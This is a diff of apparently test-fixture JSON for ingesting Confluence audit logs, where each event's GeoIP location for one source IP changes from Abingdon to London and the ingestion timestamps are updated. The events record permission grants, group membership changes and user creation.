@@ -14675,20 +13781,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -14696,7 +13796,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222661983Z", + "ingested": "2021-12-14T14:34:31.513267033Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.253Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14777,20 +13877,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -14798,7 +13892,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222663872Z", + "ingested": "2021-12-14T14:34:31.513267444Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.251Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14879,20 +13973,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -14900,7 +13988,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222665736Z", + "ingested": "2021-12-14T14:34:31.513267867Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.249Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -14974,20 +14062,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -14995,7 +14077,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222667607Z", + "ingested": "2021-12-14T14:34:31.513268254Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.247Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15076,20 +14158,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -15097,7 +14173,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222669507Z", + "ingested": "2021-12-14T14:34:31.513268639Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.245Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15178,20 +14254,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -15199,7 +14269,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222671388Z", + "ingested": "2021-12-14T14:34:31.513269085Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.242Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15273,20 +14343,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -15294,7 +14358,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222673260Z", + "ingested": "2021-12-14T14:34:31.513269478Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.240Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15375,20 +14439,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -15396,7 +14454,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222675160Z", + "ingested": "2021-12-14T14:34:31.513269860Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.238Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15477,20 +14535,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -15498,7 +14550,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222677050Z", + "ingested": "2021-12-14T14:34:31.513270247Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.235Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15572,20 +14624,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -15593,7 +14639,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222679021Z", + "ingested": "2021-12-14T14:34:31.513270626Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.231Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15674,20 +14720,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -15695,7 +14735,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222681008Z", + "ingested": "2021-12-14T14:34:31.513271005Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.219Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15776,20 +14816,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -15797,7 +14831,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222682888Z", + "ingested": "2021-12-14T14:34:31.513271394Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.192Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -15864,20 +14898,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -15885,7 +14913,7 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-08T15:08:08.222684773Z", + "ingested": "2021-12-14T14:34:31.513271781Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.950Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"admin\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -15959,20 +14987,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -15980,7 +15002,7 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-08T15:08:08.222686633Z", + "ingested": "2021-12-14T14:34:31.513272168Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.924Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"admin\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -16070,20 +15092,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -16091,7 +15107,7 @@ }, "event": { "action": "audit.logging.summary.user.created", - "ingested": "2021-12-08T15:08:08.222688718Z", + "ingested": "2021-12-14T14:34:31.513272765Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.860Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.created\",\"action\":\"User created\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"}],\"changedValues\":[{\"key\":\"Active\",\"i18nKey\":\"Active\",\"to\":\"Yes\"},{\"key\":\"Display name\",\"i18nKey\":\"Display name\",\"to\":\"test user\"},{\"key\":\"Email\",\"i18nKey\":\"Email\",\"to\":\"test.user@example.com\"},{\"key\":\"Username\",\"i18nKey\":\"Username\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", @@ -16170,20 +15186,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -16191,7 +15201,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222690609Z", + "ingested": "2021-12-14T14:34:31.513273405Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.253Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATESPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16261,20 +15271,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -16282,7 +15286,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222692481Z", + "ingested": "2021-12-14T14:34:31.513273962Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.251Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATESPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -16352,20 +15356,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -16373,7 +15371,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:08:08.222694353Z", + "ingested": "2021-12-14T14:34:31.513274356Z", "original": 